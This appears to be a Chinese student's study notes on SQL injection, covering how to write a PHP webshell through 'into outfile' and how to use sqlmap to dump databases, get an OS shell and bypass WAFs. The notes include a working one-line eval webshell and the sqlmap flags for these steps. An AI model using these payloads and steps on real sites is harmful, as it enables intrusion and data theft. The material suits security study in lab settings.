sql上传⽊马
第⼗周笔记—SQLmap和sql注⼊上传⽊马
⽬录
第⼗周笔记—SQLmap和sql注⼊上传⽊马
SQL注⼊
上传⽊马
SQLmap
六⼤模块
命令
参数
三种请求⽅式
用phpstudy搭建网站
取得系统shell
sqlmap⾼级注⼊
SQL注⼊
上传⽊马
前提:
要知道⽹站的绝对路径
具有写⼊权限
select 'hello world' into outfile 'c:/' --路径的斜杠⽤ /或者\\ --把hello world写⼊⽂件中实战攻击语句: select * from boy where hid='' union select 11
⽤菜⼑连接,⽹址为⽊马的路径(不是绝对路径)
⼀句话⽊马:<?php @eval($_POST[996])?> --密码为996
⽤order by(排序)语句试出有多少列
PHP学习⽹站:
phpstudy
SQLmap
六⼤模块
输⼊
输出
发送数据
接受数据
注⼊点检测
真正攻击模块
命令
参数
-r //读取⽂件
-u //读取⽹址
-v 3 //查看sql注⼊的命令 -flush //清除缓存 --is-dba //是否为dba --os-shell //获取系统shell --dbs //查看所有数据库,命令⽤完即删 --threads //线程数 --current-db //查看当前⽹站⽤的库,命令⽤完即删 -D "[库名]" //使⽤指定库 -T "[表名]" //使⽤指定表 --count //查有⼏列,命令⽤完即删 --colums //查列名,显⽰列名和他的类型 -C "[列名]" //使⽤指定列名,可以⽤逗号隔开 --dump //把指定列名dump下来,慎⽤,⾦融⽹站犯法 --start 1 //从第⼀条dump到第⼆条(不是从0开始取) --stop 2
三种请求⽅式
参见图⽚
取得系统shell
⾃动上传⽊马
⽤x或者q退出,否则会留下⽊马
原理:传上去⼀个具有远程命令执⾏漏洞的页⾯
条件:
1. 绝对路径
2. dba超级管理员
命令参数:
--os-shell
--web-root="[绝对路径]" //需要上传⽊马的⽬录
sqlmap⾼级注⼊
--identify-waf //⾃动测试waf防⽕墙
--tamper [tamper脚本名称] //⼿⼯指定混码脚本绕过,混码:空⽩符⽤%20或者%09代替, //脚本在sqlmap/tamper⽂件下,多个脚本⽤逗号隔开
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论